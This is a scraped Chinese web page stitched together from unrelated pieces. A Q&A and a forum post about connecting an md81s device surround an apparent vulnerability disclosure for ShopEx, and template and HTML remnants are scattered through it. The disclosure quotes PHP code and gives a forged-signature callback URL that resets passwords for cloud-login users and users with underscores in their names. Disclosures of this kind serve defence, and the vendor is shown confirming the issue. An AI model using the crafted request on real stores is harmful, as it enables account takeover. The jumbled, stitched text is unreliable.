md81s wifi连接密码_百度知道
md81s wifi连接密码
md81s wifi连接密码
下个联连免费wifi，说不定可以直接连上哦，而且能够直接看到密码的~试试就知道了~
其他类似问题
为您推荐：
wifi的相关知识
其他1条回答
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向第三方安全合作伙伴开放
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
shopex 接口设计问题导致某一类用户名密码重置
详细说明：
看到 shopex 有一个云登录机制，看代码:
code 区域// 云登陆回调地址
function ecopen_login_verify(){
// 签名验证
$token = $this-&system-&getConf('certificate.token');
($_GET['sign'] && $this-&get_ce_sign($_GET, $token) == $_GET['sign']) || exit(&签名错误，云登陆无法完成&);
// 为登陆者创建账户
$accountMdl = $this-&system-&loadModel('member/account');
$mem = $accountMdl-&createotherlogin($_GET);
if(!$mem){
$this-&splash('failed',$this-&system-&base_url(),__('登陆失败,请检查！'));
跟进去看看get_ce_sign
code 区域function get_ce_sign($params,$token){
ksort($params);
reset($params);
while (list ($key, $val) = each ($params)) {
if ( 'sign' == $key )
$arg.=$key.&=&.urlencode($val).&&&;
return md5(substr($arg,0,count($arg)-2).$token);//去掉最后一个问号
这里默认安装时候token是个空值
所以之后md5是可以计算出来的，根据他的函数我们计算一个url
http://localhost/shopex/?passport-ecopen_login_verify.html&open_type=xxxxxxx&open_id=yyyyy&nickname=xxxxx&email=&password=mmmm&sign=c5baa4ce6a
跟进去$mem = $accountMdl-&createotherlogin($_GET);
code 区域public function createotherlogin( $row )
$user['member_refer'] = $row['open_type'];
$toolsMdl = $this-&system-&loadModel( &utility/tools& );
$user['uname'] = $row['open_type'].&_&.$row['open_id'];
$user['name'] = $row['realname'] ? $row['realname'] : $row['nickname'];
$defcur = $this-&db-&selectrow( &SELECT cur_code FROM sdb_currency WHERE def_cur=\&true\&& );
$user['cur'] = $defcur['cur_code'];
$user['member_lv_id'] = $this-&system-&loadModel( &member/level& )-&getDefauleLv( );
$user['password'] = $this-&encrypt_passwd_enhanced( $user['uname'].$Var_528.STORE_KEY );
$user['lang'] = &123&;
$user['email'] = $row['email'] ? $row['email'] : &*@*.com&;
if ( $user['email'] != &*@*.com& && !$toolsMdl-&is_email( $user['email'] ) )
$user['province'] = $row['province'];
$user['city'] = $row['city'];
$rs = $this-&db-&exec( &SELECT * FROM sdb_members WHERE uname=\&&.$user['uname'].&\& LIMIT 1& );
if ( $mem = $this-&db-&getRows( $rs, 1 ) )
$user['member_id'] = $mem[0]['member_id'];
if ( $sql = $this-&db-&getUpdateSQL( $rs, $user ) )
$this-&db-&exec( $sql );
$user['regtime'] = NOW;
$user['reg_ip'] = $this-&
$this-&db-&exec( $this-&db-&getInsertSQL( $rs, $user ) );
$user['member_id'] = $this-&db-&lastInsertId( );
$user['secstr'] = $this-&cookieValue( $user['member_id'] );
$user['open_type'] = $row['open_type'];
这一段代码的意思就是，如果通过uname去查询的用户不存在的话，说明是个新用户
做插入操作，也就是云注册的新用户，如果这个用户存在的话就做更新资料操作
问题卡在了这里：
$user['uname'] = $row['open_type'].&_&.$row['open_id'];
也就是说这个用户名必须中间有下划线
通过这一番描述可见，如果是通过云注册的用户，资料可以通过单一的用户名修改这个用户的资料，如果是非云注册的用户，那么如果该用户注册的时候，用户名里面有下划线，就可以操纵修改这个用户的相关资料，包括密码
我们来测试一下
http://localhost/shopex/?passport-ecopen_login_verify.html&open_type=xxxxxxx&open_id=yyyyy&nickname=xxxxx&email=&password=mmmm&sign=c5baa4ce6a
后台抓取的第一个sql是：
在发送一次
抓看第二个sql：
正好和猜想的逻辑一样，在分一下密码这里
$user['password'] = $this-&encrypt_passwd_enhanced( $user['uname'].$Var_528.STORE_KEY );
code 区域public function encrypt_passwd_enhanced( $pwd, $uname, $regtime )
if ( !$pwd || !$uname || !$regtime )
$pwd = ( ( ( $pwd ) ).( $uname ).$regtime );
return &s&.( $pwd, 0, 31 );
如果get传递过来的pwd 和 uname 和regtime都不为空的话 就会计算一个密码，这个密码我们也是可以控制的
唯一遗憾的就是只能重置云登录用户和用户uname里面有下划线的用户
漏洞证明：
修复方案：
版权声明：转载请注明来源 @
厂商回应：
危害等级：低
漏洞Rank：4
确认时间： 17:53
厂商回复：
非常感谢您为shopex信息安全做的贡献
我们将尽快修复
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论，请先播放列表加载中...
正在载入...
分享视频：
嵌入代码：
拍下二维码，随时随地看视频
MD81S操作指导视频
上 传 者：
内容介绍：
MD81S操作指导视频
Channel Me 精选
我来说点啥
版权所有 CopyRight
| 京网文[0号 |
| 京公网安备：
互联网药品信息服务资格证：（京）-非经营性- | 广播电视节目制作经营许可证：（京）字第403号
<img src="" width="34" height="34"/>
<img src=""/>
<li data-vid="">
<img src=""/><i data-vid="" class="ckl_plays">
<img width="132" height="99" src=""/>
在线人数：
<li data-vid="">
<img src=""/><i data-vid="" class="ckl_plays">
<img src="///img/blank.png" data-src=""/>
<img src="///img/blank.png" data-src="http://"/>
<li data-vid="" class="cfix">
src="///img/blank.png" data-src=""/>
<i data-vid="" class="ckl_plays">
<li data-vid="" class="cfix">
src="///img/blank.png" data-src=""/><i data-vid="" class="ckl_plays">
没有数据！
{upload_level_name}
粉丝 {fans_count}
{video_count}
{description}查看: 586|回复: 0
最后登录15/2/12注册时间12/5/16阅读权限50积分0精华0帖子金币-15613 枚91币0 枚
钻石: 0 颗
人气: 0 次
金币: -15613 个
发表于 15/3/13 20:49:53
iphone是怎样连接md81s，用什么软件同步看视频
帖子永久地址：&<button type="submit" class="pn" onclick="setCopy('iphone是怎样连接md81s，用什么软件同步看视频\n/thread--1.html', '帖子地址已经复制到剪贴板您可以用快捷键 Ctrl + V 粘贴到 QQ、MSN 里。')">推荐给好友
GMT+8, 15/11/11 03:53
Powered by